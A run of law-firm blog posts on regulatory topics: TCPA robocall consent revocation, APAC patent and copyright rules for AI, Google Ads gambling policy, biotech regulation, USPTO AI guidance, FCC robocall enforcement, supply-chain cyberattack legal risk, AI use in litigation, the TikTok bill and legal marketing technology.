On February 15, 2024, the FCC adopted the TCPA Consent Order in the above-captioned proceeding. In that rulemaking, the FCC adopted rules making it simpler for consumers to revoke consent to receive unwanted robocalls and robotexts. Callers and texters must honor these opt-out requests in a timely manner.
The TCPA Consent Order established that these rules would become effective six months following publication in the Federal Register that the Office of Management and Budget has completed its review of the modified information collection requirements under the Paperwork Reduction Act of 1995. OMB approved these modified information collection requirements on September 26, 2024.
On October 11, 2024, the FCC announced in the Federal Register that compliance with the amendments and new rules set forth in the TCPA Consent Order as contained in 47 CFR §§ 64.1200(a)(9)(i)(F), (10), (11) and (d)(3) is required as of April 11, 2025.
Background of the TCPA Rules on Revoking Consent for Unwanted Robocalls and Robotexts
The TCPA restricts robocalls and robotexts absent the prior express consent of the called party or a recognized exemption. The FCC has made clear that consumers have a right to decide which robocalls and robotexts they wish to receive by exercising their ability to grant or revoke consent to receive such calls and texts.
The FCC has now adopted new rules to strengthen the ability of consumers to decide which robocalls and robotexts they wish to receive, codified the FCC’s past guidance on consent to make these requirements easily accessible and apparent to callers and consumers, and closed purported loopholes that allow wireless providers to make robocalls and robotexts without the ability for the subscriber to opt out.
What is the Practical Impact of the TCPA Revocation Rules?
As previously discussed by FTC defense and telemarketing compliance attorney Richard B. Newman, in March 2024 the Federal Communications Commission announced that it adopted new rules and codified previously adopted protections that make it simpler for consumers to revoke consent to unwanted robocalls and robotexts (specifically, autodialed and/or artificial/ prerecorded voice calls and texts) while requiring that callers and texters honor these requests in a timely manner.
In pertinent part:
Revocation of prior express consent for autodialed, prerecorded or artificial voice calls (and autodialed texts) can be made in any reasonable manner (callers may not infringe on that right by designating an exclusive means to revoke consent that precludes the use of any other reasonable method).
Callers are required to honor do-not-call and consent revocation requests within a reasonable time not to exceed ten (10) business days of receipt.
Text senders are limited to a prompt one-time text message confirming a consumer’s request that no further text messages be sent under the TCPA (the longer the delay, the more difficult it will be to demonstrate that such a message falls within the original prior consent).
Revocation of consent applies only to those autodialed and/or artificial/prerecorded voice calls and texts for which consent is required.
A revocation to marketing messages precludes all further telephone calls or text messages unless an enumerated exemption exists.
Telemarketers and lead generators should consult with an experienced FTC defense lawyer to discuss the scope of the new rules and protections, including, but not limited to, the scope and applicability of a revocation for one purpose to other communication purposes.
Globally, governments are grappling with the emergence of artificial intelligence (“AI”). AI technologies introduce exciting new opportunities but also bring challenges for regulators and companies across all industries. In the Asia-Pacific (“APAC”) region, there is no exception. APAC governments are adapting to AI and finding ways to encourage and regulate AI development through existing intellectual property (“IP”) regimes and new legal frameworks.
AI technologies aim to simulate human intelligence through developing smart machines capable of performing tasks that require human intelligence. The expanding market for AI ranges from machine learning to generative AI to virtual assistants to robotics, and this list merely scratches the surface.
When it comes to IP and AI, there are several critical questions for governments to consider: Can AI models be protected by existing legal frameworks within IP? Must copyright owners be human? Does a patent inventor have to be an individual? Do AI models’ training programs infringe on others’ copyrights?
To begin to answer these questions, regulators are drawing from existing IP regimes, including patent and copyright law. Some APAC countries have taken a non-binding approach, relying on existing principles to guide AI regulation. Others are drafting more specific AI regulations. The summary chart below provides a brief overview of current patent and copyright laws within APAC focused on AI and IP. Additional commentary concerning updates to AI laws and regulations is provided below the chart.
Country
Patent
Copyright
Korea
A non-human cannot be the inventor under Korea’s Patent Act. There is a requirement for “a person.”
The Copyright Act requires a human creator. Copyright is possible if the creator is a human using generative AI models as software tools and the human input is considered more than simple prompt inputs. For example, in Korea, copyright was granted to a movie produced by generative AI as a “compilation work” in December 29, 2023.
Japan
Under Japan’s Patent Act, a natural person must be the inventor. This is the “requirement of shimei 氏名” (i.e. name of a natural person).
Japan’s Copyright Act defines a copyright-protected work as “a creation expressing human thoughts and Emotions.” However, in February 29, 2024, the Agency for Cultural Affairs committee’s document on “Approach to AI and Copyright” provided that a joint work made up of both human input and AI generated content can be eligible for copyright protection.
Taiwan
Taiwan’s Patent Law does not explicitly preclude a non-human inventor, however, the Patent Examination Guidelines require a natural person to be an inventor. Formalities in Taiwan also require an inventor’s name and nationality.
The Copyright Act requires of “human creative expression.”
China
The inventor needs to be a person under Patent Law and the Guidelines for Examination in China.
Overall, Chinese courts have recognized that when AI-generated works involve human intellectual input, the user of the AI software is the copyright owner.
Hong Kong
The Patents Ordinance in Hong Kong requires a human inventor.
The Copyright Ordinance in Hong Kong attributes authorship to “the person by whom the arrangements necessary for the creation of the work are undertaken.”
Philippines
Patent law in the Philippines requires a natural person to be the inventor.
Generally, copyright law in the Philippines requires the author to be a natural person. The copyright in works that are partially AI-generated protects only those parts that are created by natural persons. The Philippines IP Office relies on the declarations of the creator claiming copyright to provide which part of the work is AI-generated and which part is not.
Vietnam
AI cannot be an IP right owner in Vietnam. The user of AI is the owner, regardless of the degree of work carried out by AI.
In terms of copyright, AI cannot be an IP right owner. Likewise, the user of AI is the owner, regardless of the degree of work carried out by AI.
Thailand
Thailan’s Patent law in Thailand requires inventors to be individuals.
Copyright law in Thailand requires an author to be an individual.
Malaysia
Malaysia’s Patent law requires inventors to be individuals.
Copyright law in Malaysia requires an author to be an individual.
Singapore
Patent law requires inventors to be a natural person(s). However, the owner can be a natural person or a legal entity.
In Singapore, it is implicit in provisions of the Copyright Act that the author must be a natural person.
Indonesia
Under Indonesia’s patent law, the inventor may be an individual or legal entity.
Under copyright law in Indonesia, the author of a work may be an individual or legal entity.
India
India’s patent law requires inventors to be a natural person(s).
The copyright law contains a requirement of “originality” – which the courts interpret as “intellectual effort by humans.”
Australia
The Full Federal Court in Australia ruled that an inventor must be a natural person.
Copyright law in Australia requires the author to be a human.
New Zealand
One court in New Zealand has ruled that AI cannot be an inventor under the Patents Act.
A court in New Zealand has ruled that AI cannot be the author under the provisions of the Copyright Act. There is updated legislation clarifying that the ownership of computer-generated works is the person who “made the arrangements necessary” for the creation of the work.
AI Regulation and Infringement
KOREA: Court decisions have ruled that web scraping or pulling information from a competitor’s website or database infringes on competitor’s database rights under the Copyright Act and the UCPA. In Koria, parties must obtain permission for use of copyrighted work for training AI emphasized in guidelines. The Copyright Commission published guidelines on copyright and AI in December 2023. The guidelines noted the growing need for legislation on AI generated works. The English version of the guidelines was released in April 2024.
JAPAN: The January 1, 2019 Copyright Act provides very broad rights to use copyrighted works without permission for training AI, as long as the training is for the purpose of technological development. The committee aims to introduce checks to this freedom, and also to provide more protection for Japan-based content creators and copyright holders. The Japan Agency for Cultural Affairs (ACA) released its draft “Approach to AI and Copyright” for public comment on January 23, 2024. Additional changes have been made to the draft after considering 25,000 comments as of February 29, 2025. Also, the Ministry of Internal Affairs and Communications, Ministry of Economy, Trade and compiled the AI Guidelines for Business Ver1.0 in Japan on April 19, 2024.
TAIWAN: Using copyrighted works to train AI models involves “reproduction”, which constitutes an infringement, unless there is consent or a license to use the work. Taiwan’s IPRO released an interpretation to clarify AI issues in June 2023. Under the IPO interpretation circular of June 2023, the Taiwan cabinet approved draft guidelines for the use of generative AI by the executive branch of the Taiwan government in August 2023. The executive branch of the Taiwan government also confirmed that it is in the process of formulating the government’s version of the Draft AI Law, which is expected to be published this year.
CHINA: Interim Measures for the Management of Generative Artificial Intelligence Services, promulgated in July 2023, require that generative AI services “respect intellectual property rights and commercial ethics” and that “intellectual property rights must not be infringed.” The consultation draft on Basic Security Requirements for Generative Artificial Intelligence Service, which was published in October 2023, provides detailed guidance on how to avoid IP infringement. The requirements, for example, provide specific processes concerning model training data that Chinese AI companies must adopt. Moreover, China’s draft Artificial Intelligence Law, proposed on March 16, 2024, outlines the use of copyrighted material for training purposes, and it serves as a complement to China’s current AI regulations.
HONG KONG: A review of copyright law in Hong Kong is underway. There is currently no overarching legislation regulating the use of AI, and the existing guidelines and principles mainly provide guidance on the use of personal data.
VIETNAM: AI cannot have responsibility for infringement, and there are no provisions under existing laws in Vietnam regarding the extent of responsibility of AI users for infringing acts. The Law on Protection of Consumers’ Rights will take effect on July 1, 2024. This law requires operators of large digital platforms to periodically evaluate the use of AI and fully or partially automated solutions.
THAILAND: Infringement in Thailand requires intent or implied intent, for example, from the prompts made to the AI. Thai law also provides for liability arising out of the helping or encouraging of infringement by another. Importantly, the AI user may also be exposed to liability in that way.
MALAYSIA: An informal comment from February 2024 by the Chairman of the Malaysia IP Office provides that there may be infringement through the training and/or use of AI programs.
SINGAPORE: Singapore has a hybrid regime. The regime provides a general fair use exception, which is likely guided by US jurisprudence, per the Singapore Court of Appeal. The regime also provides exceptions for specific types of permitted uses, for example, the computational data analysis exception. A Landscape Report on Issues at the Intersection of AI and IP issued by IPOS on February 28, 2024 provided a Model AI Governance Framework for Generative AI, which was published May 30, 2024.
INDONESIA: A “circular,” a government issued document similar to a white paper, implies that infringement is possible in Indonesia. The nonbinding Communications and Information Ministry Circular No. 9/2023 on AI was signed in December 2023.
INDIA: Under the Copyright Act of 1957, a Generative AI user has an obligation to obtain permission to use the copyright owner’s works for commercial purposes. In February 2024, the Ministry of Commerce and Industry’s Statement provided that India’s existing IPR regime is “well-equipped to protect AI-generated works” and therefore, it does not require a separate category of rights. MeitY issued a revised advisory on March 15, 2024 providing that platforms and intermediaries should ensure that the use of AI models, large language models, or generative AI software or algorithms by end users does not facilitate any unlawful content stipulated under Rule 3(1)(b) of the IT Rules, in addition to any other laws.
AUSTRALIA: Any action seeking compensation for infringement of a copyright work by an AI system would need to rely on the Copyright Act of 1968. It is an infringement of copyright to reproduce or communicate works digitally without the copyright owner’s permission. Australia does not have a general “fair use” defense to copyright infringement.
NEW ZEALAND: While infringement by AI users has not yet considered by New Zealand courts, New Zealand has more restricted “fair dealing” exceptions. Copyright review is underway in New Zealand.
Google has set the stage for a transformative change slated for July 15, 2024, providing a roadmap to extend Google Ads to daily fantasy sports (“DFS”) operators and lottery courier services across numerous U.S. states. A significant shift in the search engine’s Google Ads gambling and games policy, this move is indicative of the company’s responsiveness to the evolving legal landscape surrounding online gaming and lottery courier services. Industry stakeholders must navigate this new advertising landscape mindfully, seizing its potential within regulatory bounds. Legal advice and assistance may be needed to address the new policies and understand the new Google environment.
Google announced that it would permit these businesses to advertise on a state-by-state basis.
Approved for DFS Advertising: Alaska, California, Florida, Georgia, Kentucky, Minnesota, Nebraska, New Mexico, North Carolina, North Dakota, Oklahoma, Rhode Island, South Dakota, Utah, West Virginia, Wisconsin, and Wyoming.
Approved for Lottery Courier Advertising: Alaska, Arkansas, Colorado, District of Columbia, Idaho, Illinois, Iowa, Kansas, Kentucky, Louisiana, Maine, Maryland, Massachusetts, Minnesota, Missouri, Montana, Nebraska, New Jersey, New Mexico, New York, North Carolina, North Dakota, Ohio, Oklahoma, Oregon, Pennsylvania, Rhode Island, South Carolina, South Dakota, Tennessee, Texas, Vermont, West Virginia, and Wyoming.
If advertisers are targeting their ads in a state that does not require a license to conduct DFS or lottery courier service, they must be licensed in at least one other U.S. state that mandates such a license.
The Legal Context of the Updated Google Ads Policy
Usually circumspect when it comes to gambling-related content, Google’s policy update marks a notable departure. Traditionally, its stringent restrictions limited advertising to state-run lotteries and horse racing only. The historical context here is important as this shift from Google’s previously conservative policy marks a wider change in the digital advertising of gaming activities. Now, licensed lottery courier services will be able to market themselves through Google Ads in 40 states, excluding California due to specific state restrictions. The revised guidelines correspond with the expanding endorsement and enactment of governance over online gaming and lottery operations. Nonetheless, this update enforces rigorous procedural rules and criteria for advertising compliance, encompassing adherence to both individual state regulations and the certification processes established by Google.
This paradigm shift in Google’s policy echoes their latest requirements for advertisers, who are compelled to demonstrate compliance not just through licensing but also through the integrity of their ad content and search positioning efforts, reflecting a commitment to consumer trust and regulatory adherence.
Daily Fantasy Sports Advertising: A New Playing Field
On the DFS front, Google’s policy expansion allows operators to advertise in 17 states, including jurisdictions where online sports betting remains unlegislated. DFS operators in states which currently do not permit online sports betting will remain at liberty to run Google ads. This reflects Google’s nuanced approach to advertising within the gaming industry, ensuring that ads from entities that have met state-imposed standards are available to users. DFS providers can enter new markets at the rollout, subject to regulatory compliance, including state licensing. In states without such licensing requirements, operators must nonetheless hold a valid license from another state that does enforce scrutiny of operators, underscoring Google’s effort in promoting only legitimate, reputable services.
Lottery Courier Advertising: Riding the Wave of Legalization
Entities such as Jackpocket and Lotto.com, acting as intermediaries, can now increase their visibility and customer base through Google Ads. Among other recent developments, DraftKings’ recent acquisition of Jackpocket for $750 million showcases the growing economic significance of lottery courier services. This growing market, while gaining popularity for convenience, is also varied in acceptance across states; advertisers must navigate diverse regulations and be keenly aware of states like California, where the State lottery commission has expressed restrictions and presently takes a dim view of courier operations.
Understanding Compliance: Standing At the Gate of Certification
Google’s guidelines mandate advertisers provide evidence of all aspects of their operation, from licensing to customer data protection and legal compliance. Certification thus becomes synonymous with service integrity, with Google’s policy now establishing this as a prerequisite. To synchronize with this directive, advertisers must:
Hold an official license in one state, considering the dynamics of interstate variances in regulation.
Target ads with precision, respecting the complexities of state-specific legal frameworks.
Engage diligently with Google’s certification process, indicative of an advertiser’s adherence to compliance and transparency.
Advertisers seeking certification need to demonstrate compliance with rigorous legal standards, including the authentication of tickets and adherence to regulations. The process calls for delivering not just proof of licensing where required, but also extensive details pertaining to their business operations. The intent behind this comprehensive evaluation is to safeguard consumers by preventing untrustworthy services from gaining approval to advertise.
It will be particularly interesting to understand how Google enforces its ”licensing” requirement for vendors, such as marketing affiliates, which promote lottery/fantasy sports services indirectly. Unlike B2C fantasy sports operators or couriers, these B2B entities traditionally not providing consumer-facing services may not be subject to the same state licensing demands, yet they must still navigate the intricacies of Google’s policy in their marketing efforts.
Implications for Advertisers: A Forward-Looking Approach
In navigating Google’s updated advertising framework, adherence to its detailed certification process is paramount to successful marketing. A failure to meet Google’s more robust standards could lead to advertising restrictions on its platform and related services—underscoring the need for meticulous strategy alignment and transparent operations.
The alterations to Google’s policy demand substantial attention to detail and legal compliance. These policy changes necessitate careful scrutiny and a proactive stance from advertisers to ensure alignment with new advertising avenues. On July 15, 2024, Google’s updated advertising policies will come into effect, after which the related policy page will be updated to reflect these changes.
Google’s revisions to its policies underscore the company’s pragmatic response to the dynamic realm of Internet-based lottery-related and gaming services. Notably, Google’s decision enables lottery courier advertising in a majority of states, acknowledging the sector’s growth. It is highly likely that other social media platforms will soon follow suit, thereby setting new standards for these business to adhere to if they want to take advantage of these powerful tools.
What Happened: EPA, USDA, and FDA issued a joint plan for regulatory reform under their Coordinated Framework for the Regulation of Biotechnology.
Who’s Impacted: Developers of PIPs, modified mosquitos, biopesticides, and other biotechnology products under EPA’s jurisdiction.
What Should They Consider Doing in Response: Watch the three agencies’ regulatory dockets closely and consider submitting comments once new rules or draft guidance are published that may affect their products.
Background
President Biden’s executive order defined “biotechnology” as “technology that applies to or is enabled by life sciences innovation or product development.” Biotechnology products thus may include organisms (plants, animals, fungi, or microbes) developed through genetic engineering or manipulation, products derived from such organisms, and products produced via cell-free synthesis. These products may, in turn, be regulated under the overlapping statutory frameworks of the Federal Insecticide, Fungicide and Rodenticide Act (FIFRA), Federal Food, Drugs and Cosmetics Act (FFDCA), Plant Pest Act (PPA), Federal Meat Inspection Act, Poultry Products Inspection Act, and more. Therefore, close coordination between EPA, USDA, and FDA is essential to ensure effective and efficient regulation of biotechnology products.
EPA Sets Sights on PIPs, Mosquitos, and Biopesticide Products
The agencies’ newly released plan identifies five biotechnology product categories where regulatory clarification or simplification are warranted: (1) modified plants; (2) modified animals; (3) modified microorganisms; (4) human drugs, biologics, and medical devices; and (5) cross-cutting issues. Under the new plan, EPA is engaged in all but the fourth category above.
For example, EPA has already taken steps to clarify its regulation of modified plant products, such as exempting from regulation under FIFRA and FFDCA certain plant-incorporated protectants (PIPs) created in plants using newer technologies. EPA next plans to address the scope of plant regulator PIPs and update its 2007 guidance on small-scale field testing of PIPs to reflect technological developments and harmonize with USDA containment measures.
Regarding modified animal products, EPA intends to work with USDA and FDA to coordinate and provide updated information on the regulation of modified insect and invertebrate pests. Specifically, EPA intends to provide efficacy testing guidance on genetically modified mosquitos intended for population control. As outlined in guidance published by FDA in October 2017, products intended to reduce the population of mosquitoes by killing them or interfering with their growth or development are considered “pesticides” subject to regulation by EPA, while products intended to reduce the virus/pathogen load within mosquitoes or prevent mosquito-borne disease in humans or animals are considered “new animal drugs” subject to regulation by FDA.
EPA also now intends to prioritize its review of biopesticide applications, provide technical assistance to biopesticide developers, and collaborate with state pesticide regulators to help bring new biopesticide products to market more quickly.
Further, the three agencies are making efforts to collaborate with each other and with the regulated community. The agencies jointly released plain-language information on regulatory roles, responsibilities, and processes for biotechnology products in November 2023 and now intend to explore the development of a web portal that would direct developers to the appropriate agency or office overseeing their product’s development or regulatory status. The agencies also intend to develop a mechanism for a product developer to meet with all agencies at once early in a product’s development process to clarify the agencies’ respective jurisdictions and provide initial regulatory guidance; to update their joint information-sharing memorandum of understanding; and to formally update the Coordinated Framework for the Regulation of Biotechnology by the end of the year.
Biotechnology product developers should closely monitor EPA, USDA, and FDA’s progress on the actions described above, as well as other USDA- and FDA-specific regulatory moves. Developers should assess the regulatory barriers to their products’ entry to market, consider potential fixes, and be prepared to submit feedback as the agencies propose new rules or issue draft guidance for comment.
The USPTO expounds a clear message for patent and trademark attorneys, patent agents, and inventors: use of artificial intelligence (AI), including generative AI, in patent and trademark activities and filings before the USPTO entails risks to be mitigated, and you must disclose use of AI in creation of an invention or practice before the USPTO if the use of AI is material to patentability.
The USPTO’s new guidance issued on April 11, 2024 is a counterpart to its guidance issued on February 13, 2024, which addresses AI-assisted invention creation process. In the new guidance issued on April 11, 2024, USPTO officials communicate the risks of using AI in preparing USPTO submissions, including patent applications, affidavits, petitions, office action responses, information disclosure statements, Patent Trial and Appeal Board (PTAB) submissions, and trademark / Trademark Trial and Appeal Board (TTAB) submissions. The common theme between the February 13 and April 11 guidance is the duty to disclose to the USPTO all information known to be material to patentability.
Building on the USPTO’s existing rules and policies, the USPTO’s April 11 guidance discusses the following:
(A) The duty of candor and good faith – each individual associated with a proceeding at the USPTO owes the duty to disclose the USPTO all information known to be material to patentability, including on the use of AI by inventors, parties, and practitioners.
(B) Signature requirement and corresponding certifications – using AI to draft documents without verifying information risks “critical misstatements and omissions”. Any submission for the USPTO in which AI helped prepare must be carefully reviewed by practitioners, who are ultimately responsible, to ensure that they are true and submitted for a proper purpose.
(C) Confidentiality of information – sensitive and confidential client information risks being compromised if shared to third-party AI systems, some of which may be located outside of the United States.
(D) Foreign filing licenses and export regulations – a foreign filing license from the USPTO does not authorize the exporting of subject matter abroad for the preparation of patent applications to be filed in the United States. Practitioners must ensure data is not improperly exported when using AI.
(E) USPTO electronic systems’ policies – Practitioners using AI must be mindful of the terms and conditions for the USPTO’s electronic system, which prohibit the unauthorized access, actions, use, modifications, or disclosure of the data contained in the USPTO system in transit to/from the system.
(F) The USPTO Rules of Professional Conduct – when using the AI tools, practitioners must ensure that they are not violating the duties owed to clients. For example, practitioners must have the requisite legal, scientific, and technical knowledge to reasonably represent the client, without inappropriate reliance on AI. Practitioners also have duty to reasonably consult with the client, including about the use of AI in accomplishing the client’s objectives.
The USPTO’s April 11 guidance overall shares principles with the ethics guidelines that multiple state bars have issued related to generative AI use in practice of law, and addresses them in the patent- and trademark-specific context. Importantly, in addition to ethics considerations, the USPTO guidance reminds us that knowing or willful withholding of information about AI use under (A), overlooking AI’s misstatements leading to false certification under (B), or AI-mediated improper or unauthorized exporting of data or unauthorized access to data under (D) and (E) may lead to criminal or civil liability under federal law or penalties or sanctions by the USPTO.
On the positive side, the USPTO guidance describes the possible favorable aspects of AI “to expand access to our innovation ecosystem and lower costs for parties and practitioners…. The USPTO continues to be actively involved in the development of domestic and international measures to address AI considerations at the intersection of innovation, creativity, and intellectual property.” We expect more USPTO AI guidance to be forthcoming, so please do watch for continued updates in this area.
The FCC sent a cease and desist letter to DigitalIPvoice informing them of the need to investigate suspected traffic. The FCC reminded them that failure to comply with the letter “may result in downstream voice service providers permanently blocking all of DigitalIPvoice’s traffic”.
For background, DigitalIPvoice is a gateway provider meaning they accept calls directly from foreign originating or intermediate providers. The Industry Traceback Group (ITG) investigated some questionable traffic back in December and identified DigitalIPvoice as the gateway provider for some of the calls. ITG informed DigitalIPvoice and “DigitialIPVoice did not dispute that the calls were illegal.”
This is problematic because as the FCC states “gateway providers that transmit illegal robocall traffic face serious consequences, including blocking by downstream providers of all of the provider’s traffic.”
Emphasis in original. Yes. The FCC sent that in BOLD to DigitalIPvoice. I love aggressive formatting choices.
The FCC then gave DigitalIPvoice steps to take to mitigate the calls in response to this notice. They have to investigate the traffic and then block identified traffic and report back to the FCC and the ITG on the outcome of the investigation.
The whole letter is worth reading but a few points for voice service providers and gateway providers:
You have to know who your customers are and what they are doing on your network. The FCC is requiring voice service providers and gateway providers to include KYC in their robocall mitigation plans.
You have to work with the ITG. You have to have a traceback policy and procedures. All traceback requests have to be treated as a P0 priority.
You have to be able to trace the traffic you are handling. From beginning to end.
The FCC is going after robocalls hard. Protect yourself by understanding what is going to be required of your network.
The cyberthreat landscape is evolving as threat actors develop new tactics to keep up with increasingly sophisticated corporate IT environments. In particular, threat actors are increasingly exploiting supply chain vulnerabilities to reach downstream targets.
The effects of supply chain cyberattacks are far-reaching, and can affect downstream organizations. The effects can also last long after the attack was first deployed. According to an Identity Theft Resource Center report, “more than 10 million people were impacted by supply chain attacks targeting 1,743 entities that had access to multiple organizations’ data” in 2022. Based upon an IBM analysis, the cost of a data breach averaged $4.45 million in 2023.
What is a supply chain cyberattack?
Supply chain cyberattacks are a type of cyberattack in which a threat actor targets a business offering third-party services to other companies. The threat actor will then leverage its access to the target to reach and cause damage to the business’s customers. Supply chain cyberattacks may be perpetrated in different ways.
Software-Enabled Attack: This occurs when a threat actor uses an existing software vulnerability to compromise the systems and data of organizations running the software containing the vulnerability. For example, Apache Log4j is an open source code used by developers in software to add a function for maintaining records of system activity. In November 2021, there were public reports of a Log4j remote execution code vulnerability that allowed threat actors to infiltrate target software running on outdated Log4j code versions. As a result, threat actors gained access to the systems, networks, and data of many organizations in the public and private sectors that used software containing the vulnerable Log4j version. Although security upgrades (i.e., patches) have since been issued to address the Log4j vulnerability, many software and apps are still running with outdated (i.e., unpatched) versions of Log4j.
Software Supply Chain Attack: This is the most common type of supply chain cyberattack, and occurs when a threat actor infiltrates and compromises software with malicious code either before the software is provided to consumers or by deploying malicious software updates masquerading as legitimate patches. All users of the compromised software are affected by this type of attack. For example, Blackbaud, Inc., a software company providing cloud hosting services to for-profit and non-profit entities across multiple industries, was ground zero for a software supply chain cyberattack after a threat actor deployed ransomware in its systems that had downstream effects on Blackbaud’s customers, including 45,000 companies. Similarly in May 2023, Progress Software’s MOVEit file-transfer tool was targeted with a ransomware attack, which allowed threat actors to steal data from customers that used the MOVEit app, including government agencies and businesses worldwide.
Legal and Regulatory Risks
Cyberattacks can often expose personal data to unauthorized access and acquisition by a threat actor. When this occurs, companies’ notification obligations under the data breach laws of jurisdictions in which affected individuals reside are triggered. In general, data breach laws require affected companies to submit notice of the incident to affected individuals and, depending on the facts of the incident and the number of such individuals, also to regulators, the media, and consumer reporting agencies. Companies may also have an obligation to notify their customers, vendors, and other business partners based on their contracts with these parties. These reporting requirements increase the likelihood of follow-up inquiries, and in some cases, investigations by regulators. Reporting a data breach also increases a company’s risk of being targeted with private lawsuits, including class actions and lawsuits initiated by business customers, in which plaintiffs may seek different types of relief including injunctive relief, monetary damages, and civil penalties.
The legal and regulatory risks in the aftermath of a cyberattack can persist long after a company has addressed the immediate issues that caused the incident initially. For example, in the aftermath of the cyberattack, Blackbaud was investigated by multiple government authorities and targeted with private lawsuits. While the private suits remain ongoing, Blackbaud settled with state regulators ($49,500,000), the U.S. Federal Trade Commission, and the U.S. Securities Exchange Commission (SEC) ($3,000,000) in 2023 and 2024, almost four years after it first experienced the cyberattack. Other companies that experienced high-profile cyberattacks have also been targeted with securities class action lawsuits by shareholders, and in at least one instance, regulators have named a company’s Chief Information Security Officer in an enforcement action, underscoring the professional risks cyberattacks pose to corporate security leaders.
What Steps Can Companies Take to Mitigate Risk?
First, threat actors will continue to refine their tactics and techniques. Thus, all organizations must adapt and stay current with all regulations and legislation surrounding cybersecurity. Cybersecurity and Infrastructure Security Agency (CISA) urges developer education for creating secure code and verifying third-party components.
Second, stay proactive. Organizations must re-examine not only their own security practices but also those of their vendors and third-party suppliers. If third and fourth parties have access to an organization’s data, it is imperative to ensure that those parties have good data protection practices.
Third, companies should adopt guidelines for suppliers around data and cybersecurity at the outset of a relationship since it may be difficult to get suppliers to adhere to policies after the contract has been signed. For example, some entities have detailed processes requiring suppliers to inform of attacks and conduct impact assessments after the fact. In addition, some entities expect suppliers to follow specific sequences of steps after a cyberattack. At the same time, some entities may also apply the same threat intelligence that it uses for its own defense to its critical suppliers, and may require suppliers to implement proactive security controls, such as incident response plans, ahead of an attack.
Finally, all companies should strive to minimize threats to their software supply by establishing strong security strategies at the ground level.
Picture this: You’ve just been retained by a new client who has been named as a defendant in a complex commercial litigation. While the client has solid grounds to be dismissed from the case at an early stage via a dispositive motion, the client is also facing cost constraints. This forces you to get creative when crafting a budget for your client’s defense. You remember the shiny new toy that is generative Artificial Intelligence (“AI”). You plan to use AI to help save costs on the initial research, and even potentially assist with brief writing. It seems you’ve found a practical solution to resolve all your client’s problems. Not so fast.
Seemingly overnight, the use of AI platforms has become the hottest thing going, including (potentially) for commercial litigators. However, like most rapidly rising technological trends, the associated pitfalls don’t fully bubble to the surface until after the public has an opportunity (or several) to put the technology to the test. Indeed, the use of AI platforms to streamline legal research and writing has already begun to show its warts. Of course, just last year, prime examples of the danger of relying too heavily on AI were exposed in highly publicized cases venued in the Southern District of New York. See e.g. Benajmin Weiser, Michael D. Cohen’s Lawyer Cited Cases That May Not Exist, Judge Says, NY Times (December 12, 2023); Sara Merken, New York Lawyers Sanctioned For Using Fake Chat GPT Case In Legal Brief, Reuters (June 26, 2023).
In order to ensure litigators are striking the appropriate balance between using technological assistance in producing legal work product, while continuing to adhere to the ethical duties and professional responsibility mandated by the legal profession, below are some immediate considerations any complex commercial litigator should abide by when venturing into the world of AI.
Confidentiality
As any experienced litigator will know, involving a third-party in the process of crafting of a client’s strategy and case theory—whether it be an expert, accountant, or investigator—inevitably raises the issue of protecting the client’s privileged, proprietary and confidential information. The same principle applies to the use of an AI platform. Indeed, when stripped of its bells and whistles, an AI platform could potentially be viewed as another consultant employed to provide work product that will assist in the overall representation of your client. Given this reality, it is imperative that any litigator who plans to use AI, also have a complete grasp of the security of that AI system to ensure the safety of their client’s privileged, proprietary and confidential information. A failure to do so may not only result in your client’s sensitive information being exposed to an unsecure, and potentially harmful, online network, but it can also result in a violation of the duty to make reasonable efforts to prevent the disclosure of or unauthorized access to your client’s sensitive information. Such a duty is routinely set forth in the applicable rules of professional conduct across the country.
Oversight
It goes without saying that a lawyer has a responsibility to ensure that he or she adheres to the duty of candor when making representations to the Court. As mentioned, violations of that duty have arisen based on statements that were included in legal briefs produced using AI platforms. While many lawyers would immediately rebuff the notion that they would fail to double-check the accuracy of a brief’s contents—even if generated using AI—before submitting it to the Court, this concept gets trickier when working on larger litigation teams. As a result, it is not only incumbent on those preparing the briefs to ensure that any information included in a submission that was created with the assistance of an AI platform is accurate, but also that the lawyers responsible for oversight of a litigation team are diligent in understanding when and to what extent AI is being used to aid the work of that lawyer’s subordinates. Similar to confidentiality considerations, many courts’ rules of professional conduct include rules related to senior lawyer responsibilities and oversight of subordinate lawyers. To appropriately abide by those rules, litigation team leaders should make it a point to discuss with their teams the appropriate use of AI at the outset of any matter, as well as to put in place any law firm, court, or client-specific safeguards or guidelines to avoid potential missteps.
Judicial Preferences
Finally, as the old saying goes: a good lawyer knows the law; a great lawyer knows the judge. Any savvy litigator knows that the first thing one should understand prior to litigating a case is whether the Court and the presiding Judge have put in place any standing orders or judicial preferences that may impact litigation strategy. As a result of the rise of use of AI in litigation, many Courts across the country have responded in turn by developing either standing orders, local rules, or related guidelines concerning the appropriate use of AI. See e.g., Standing Order Re: Artificial Intelligence (“AI”) in Cases Assigned to Judge Baylson (June 6, 2023 E.D.P.A.), Preliminary Guidelines on the Use of Artificial Intelligence by New Jersey Lawyers (January 25, 2024, N.J. Supreme Court). Litigators should follow suit and ensure they understand the full scope of how their Court, and more importantly, their assigned Judge, treat the issue of using AI to assist litigation strategy and development of work product.
Yesterday, with broad bipartisan support, the U.S. House of Representatives voted overwhelmingly (352-65) to support the Protecting Americans from Foreign Adversary Controlled Applications Act, designed to begin the process of banning TikTok’s use in the United States. This is music to my ears. See a previous blog post on this subject.
The Act would penalize app stores and web hosting services that host TikTok while it is owned by Chinese-based ByteDance. However, if the app is divested from ByteDance, the Act will allow use of TikTok in the U.S.
National security experts have warned legislators and the public about downloading and using TikTok as a national security threat. This threat manifests because the owner of ByteDance is required by Chinese law to share users’ data with the Chinese Communist government. When downloading the app, TikTok obtains access to users’ microphones, cameras, and location services, which is essentially spyware on over 170 million Americans’ every move, (dance or not).
Lawmakers are concerned about the detailed sharing of Americans’ data with one of its top adversaries and the ability of TikTok’s algorithms to influence and launch disinformation campaigns against the American people. The Act will make its way through the Senate, and if passed, President Biden has indicated that he will sign it. This is a big win for privacy and national security.
While it may (or may not) be shocking that 50% of marriages end in divorce, what may be a more jarring statistic is how 77% of lawyers have experienced a failed technology implementation. And while some may take a second or even third chance at marriage, you rarely get a second chance at a marketing technology implementation, especially at a law firm.
Today’s legal industry is hyper-competitive, firms are asking attorneys to learn new skills and adopt new technology like artificial intelligence, eMarketing, or experience management systems. So, lawyers should be eager to embrace any MarTech that could help them gain an advantage, right? Unfortunately, fewer than 40% of lawyers use a CRM, and only slightly more than a quarter of them use it for sales pipeline management.
